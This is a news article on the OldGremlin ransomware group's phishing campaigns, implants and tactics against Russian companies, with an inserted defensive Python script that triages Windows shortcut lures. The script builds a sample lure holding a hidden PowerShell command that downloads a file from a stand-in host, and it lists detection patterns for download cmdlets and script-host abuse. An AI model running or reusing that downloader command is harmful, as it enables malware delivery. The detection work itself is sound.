OldGremlin Ransomware Targeted Over a Dozen Russian Entities in Multi-Million Scheme


A Russian-speaking ransomware group dubbed OldGremlin has been attributed to 16 malicious campaigns aimed at entities operating within the transcontinental Eurasian nation over the course of two and a half years.

“The group’s victims include companies in sectors such as logistics, industry, insurance, retail, real estate, software development, and banking,” Group-IB said in an exhaustive report shared with The Hacker News. “In 2020, the group even targeted an arms manufacturer.”

In what’s a rarity in the ransomware landscape, OldGremlin (aka TinyScouts) is one of the very few financially motivated cybercrime gangs that primarily focuses on Russian companies.

Other notable groups include Dharma, Crylock, and Thanos, contributing to an uptick in ransomware attacks targeting businesses in the country by over 200% in 2021.

OldGremlin first came to light in September 2020, when the Singapore-headquartered cybersecurity company disclosed nine campaigns orchestrated by the actor between May and August. The first attack was detected in early April 2020.

In all, the group is said to have conducted 10 phishing email campaigns in 2020, followed by one highly successful attack in 2021 and five more in 2022, with ransom demands touching a record $16.9 million.

“OldGremlin thoroughly study their victims,” Group-IB explained. “The demanded ransom is therefore often proportional to the company’s size and revenue and is clearly higher than the funds necessary for ensuring an adequate level of information security.”


Known to primarily target corporate networks running Windows, attacks mounted by OldGremlin have leveraged phishing emails masquerading as tax and legal services firms to dupe victims into clicking on fraudulent links and downloading malicious files, allowing the attackers to worm their way inside the networks.

“The threat actors often pose as well-known companies, including the media group RBC, the legal assistance system Consultant Plus, the company 1C-Bitrix, the Russian Union of Industrialists and Entrepreneurs, and Minsk Tractor Works,” Group-IB said.

Upon gaining an initial foothold, OldGremlin moves to establish persistence by creating scheduled tasks, gaining elevated privileges using Cobalt Strike and even flaws in Cisco AnyConnect (CVE-2020-3153 and CVE-2020-3433, both local privilege-escalation bugs in the Windows client), while also gaining remote access to the compromised infrastructure using tools such as TeamViewer.

Some of the aspects that make the group stand out from other ransomware groups are that it doesn’t rely on double extortion to coerce targeted companies into paying up despite exfiltrating data, and that it has been observed taking long breaks after each successful attack.

What’s more, the average dwell time until ransomware deployment has been pegged at 49 days, well above the reported 11-day median dwell time, suggesting extended efforts on the part of the actor to examine the breached environment (which is achieved using a tool called TinyScout).

OldGremlin’s most recent phishing wave occurred on August 23, 2022, with emails embedding links pointing to a ZIP archive payload hosted on Dropbox to activate the kill chain.

These archive files, in turn, harbor a rogue LNK file (dubbed TinyLink) that downloads a backdoor called TinyFluff, one of the four implants used by the group alongside TinyPosh, TinyNode, and TinyShell, before deleting data backups and dropping the .NET-based TinyCrypt ransomware.

  • TinyPosh: A PowerShell trojan engineered to collect and transfer sensitive information about the infected system to a remote server, and launch additional PowerShell scripts.
  • TinyNode: A backdoor that runs the Node.js interpreter to execute commands received from a command-and-control (C2) server over the Tor network.
  • TinyFluff: A successor to TinyNode, which is used as the primary downloader for receiving and running malicious scripts.
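The LNK stage of the chain described above (a shortcut inside a ZIP that hands off to a downloader) is the point where a defender can triage the lure before anything executes. The following Python script is an added example, not Group-IB’s tooling and not code recovered from OldGremlin’s TinyLink: it parses the fixed-size MS-SHLLINK header and the StringData fields of a shortcut, then flags launch arguments typical of phishing lures. The two sample shortcuts it assembles are constructed for the demonstration, and the regex heuristics are illustrative assumptions rather than indicators from the report.

```python
"""Triage a Windows shortcut (.LNK, MS-SHLLINK) by parsing its header and
StringData and flagging launch arguments typical of phishing lures."""
import re
import struct

LNK_HEADER_SIZE = 0x4C
# LinkCLSID {00021401-0000-0000-C000-000000000046} as stored on disk
LNK_CLSID = bytes.fromhex("0114020000000000C000000000000046")

# LinkFlags (MS-SHLLINK 2.1.1); only the bits this parser needs
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData entries appear in this fixed order when their flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

SW_SHOWMINNOACTIVE = 0x7  # ShowCommand value lures use to keep the console out of sight

# Illustrative heuristics (assumptions, not report indicators) applied to
# relative_path + arguments; tune for your environment.
SUSPICIOUS_PATTERNS = (
    (r"\b(powershell|pwsh)\b", "launches PowerShell"),
    (r"\b(cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin|node)(\.exe)?\b",
     "launches a script host or LOLBin"),
    (r"\s-(e|ec|enc|encodedcommand)\b", "Base64-encoded command"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-nop\b|-noprofile\b|-ep\s+bypass|executionpolicy\s+bypass",
     "no-profile or execution policy bypass"),
    (r"https?://", "URL in arguments"),
    (r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|start-bitstransfer",
     "downloads content"),
)
DOCUMENT_ICON = r"acrobat|winword|excel|\.pdf|\.docx|\.xlsx"


def _need(data: bytes, off: int, n: int) -> None:
    if off + n > len(data):
        raise ValueError(f"truncated shell link at offset {off}")


def parse_lnk(data: bytes) -> dict:
    """Return header fields and StringData of a shell link, skipping the
    LinkTargetIDList and LinkInfo blocks by their declared sizes."""
    _need(data, 0, LNK_HEADER_SIZE)
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link (bad HeaderSize or LinkCLSID)")
    show_command = struct.unpack_from("<I", data, 60)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) + IDList
        _need(data, off, 2)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize includes itself
        _need(data, off, 4)
        off += struct.unpack_from("<I", data, off)[0]
    info = {"flags": flags, "show_command": show_command}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            info[name] = None
            continue
        _need(data, off, 2)
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            _need(data, off, 2 * count)
            info[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            _need(data, off, count)
            info[name] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return info


def triage_lnk(data: bytes) -> list:
    """Return reasons a shortcut looks like a lure (empty list if none)."""
    info = parse_lnk(data)
    launch = " ".join(s for s in (info["relative_path"], info["arguments"]) if s)
    findings = [reason for pattern, reason in SUSPICIOUS_PATTERNS
                if re.search(pattern, launch, re.IGNORECASE)]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window opens minimized (SW_SHOWMINNOACTIVE)")
    if findings and re.search(DOCUMENT_ICON, info["icon_location"] or "", re.IGNORECASE):
        findings.append("document-style icon on a shortcut that runs an interpreter")
    return findings


def build_lnk(relative_path: str, arguments: str, icon_location: str,
              show_command: int = 1) -> bytes:
    """Assemble a minimal Unicode shell link (no IDList/LinkInfo) for testing."""
    flags = IS_UNICODE
    parts = []
    for bit, value in ((HAS_RELATIVE_PATH, relative_path), (HAS_ARGUMENTS, arguments),
                       (HAS_ICON_LOCATION, icon_location)):
        if value:
            flags |= bit
            parts.append(struct.pack("<H", len(value)) + value.encode("utf-16-le"))
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + b"".join(parts)


# Constructed samples (not real OldGremlin artifacts): a lure that hands off to a
# hidden PowerShell downloader behind a PDF-reader icon, and an ordinary app shortcut.
LURE_LNK = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    r'/c start /min powershell -nop -w hidden -c "iwr https://example.invalid/upd.zip -OutFile $env:TEMP\u.zip"',
    r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(
    r"..\..\Program Files\Notepad++\notepad++.exe", "",
    r"%ProgramFiles%\Notepad++\notepad++.exe",
)

if __name__ == "__main__":
    for label, blob in (("lure", LURE_LNK), ("benign", BENIGN_LNK)):
        print(label, parse_lnk(blob)["arguments"], triage_lnk(blob) or "clean")
```

To run it against a real shortcut pulled from a quarantined archive, read the file as bytes and pass it to `triage_lnk`; the parser raises `ValueError` on anything that is not a well-formed shell link, which is itself a useful signal when a lure carries a corrupted or oversized StringData block.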

Also put to use by OldGremlin are other tools such as TinyShot, a console utility for capturing screenshots, and TinyKiller, which kills antivirus processes via a bring your own vulnerable driver (BYOVD) attack targeting the gdrv.sys and RTCore64.sys drivers.


It’s worth noting that the operators behind the BlackByte ransomware were also recently found leveraging a similar flaw in the RTCore64.sys driver to turn off security solutions on compromised machines.

One other unusual tool used by OldGremlin in its attacks is a .NET console app called TinyIsolator, which temporarily cuts the host off from the network by disabling network adapters prior to executing the ransomware.

On top of that, the group’s malware arsenal features a Linux version of TinyCrypt, which is written in Go and launched after deleting .bash_history files, changing user passwords to restrict access to the compromised host, and disabling SSH.

“OldGremlin has debunked the myth that ransomware groups are indifferent to Russian companies,” Ivan Pisarev, head of the dynamic malware analysis team at Group-IB, said.

“Despite the fact that OldGremlin has been focusing on Russia so far, they should not be underestimated elsewhere. Many Russian-speaking gangs started off by targeting companies in the post-Soviet space and then switched to other geographies.”
